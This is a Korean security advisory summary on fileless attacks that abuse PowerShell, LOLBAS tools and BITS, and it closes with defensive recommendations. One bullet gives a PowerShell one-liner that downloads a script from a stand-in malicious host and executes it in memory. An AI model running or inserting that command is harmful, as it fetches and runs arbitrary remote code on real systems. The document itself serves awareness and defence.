PowerShell 및 Microsoft 정식 애플리케이션을 이용한 파일리스 공격 증가

Hackers Using PowerShell and Microsoft Legitimate Apps to Deploy Malware

Hackers Using PowerShell and Microsoft Legitimate Apps to Deploy Malware

 

• 공격 개요
  • 해커들이 PowerShell 및 Microsoft의 정식 애플리케이션을 악용하여 악성코드를 배포하는 파일리스(Fileless) 공격 증가
  • 전통적인 안티바이러스 탐지를 우회하고 포렌식 분석을 어렵게 만드는 공격 기법 사용
  • Microsoft의 LOLBAS(Living Off the Land Binaries and Scripts) 기법을 활용하여 시스템 내에서 신뢰할 수 있는 프로세스를 악용
• PowerShell 악용 및 LOLBAS 기법
  • PowerShell을 이용한 메모리 내 악성 코드 실행
    • iex((New-Object Net.WebClient).DownloadString('https://malware.com/payload.ps1'))
    • 디스크에 흔적을 남기지 않고 악성 스크립트를 직접 실행
  • Microsoft의 정식 도구(BITS 등)를 이용한 악성코드 배포
    • BITS(Background Intelligent Transfer Service) 악용
      • 시스템이 유휴 상태일 때 악성 페이로드 다운로드 및 실행
      • 보안 솔루션의 감시를 우회하는 방식
• 메모리 인젝션 및 프로세스 홀로잉(Process Hollowing)
  • 파일리스 공격의 주요 기법
    • 메모리 인젝션
      • 악성코드를 메모리에서 실행하여 파일 기반 탐지를 우회
    • 프로세스 홀로잉
      • 합법적인 프로세스를 중단 상태(Suspended)로 실행 후, 메모리 내 코드를 악성 코드로 대체
      • 이후 프로세스를 재개하여 악성코드가 정식 애플리케이션처럼 실행되도록 위장
      • Stuxnet 등 고급 APT 공격에서 처음 사용된 기법
• 보안 권고
  • EDR(Endpoint Detection and Response) 솔루션 배포
    • 전통적인 시그니처 기반 탐지 방식이 아닌 행동 기반 탐지 기술 활용
  • 메모리 분석 및 모니터링 강화
    • PowerShell 스크립트 로깅 활성화하여 실행 내역 추적
    • PowerShell 제한 모드(Constrained Language Mode) 적용
  • Active Directory 및 시스템 활동 모니터링
    • 공격자가 사용하는 LOLBAS 기법 탐지를 위한 지속적인 로그 분석 필요
  • Red Team 모의 해킹 및 내부 보안 점검 강화
    • 기업 내부 보안 테스트 및 위협 모델링 수행
    • Windows Defender Application Control(WDAC) 및 AppLocker 사용하여 정식 애플리케이션 남용 방지
• 결론
  • 파일리스 공격(Fileless Attack)은 기존 파일 기반 보안 솔루션으로 탐지하기 어렵고 방어가 까다로움
  • 해커들은 Microsoft의 정식 애플리케이션 및 PowerShell을 적극적으로 악용하여 보안 솔루션 우회
  • 기업 및 기관은 행동 기반 탐지 솔루션 및 PowerShell 제어 정책을 적극 도입해야 함
  • 보안 로그 분석 및 실시간 위협 탐지를 강화하여 시스템 내 이상 행동을 신속하게 감지하는 것이 필수적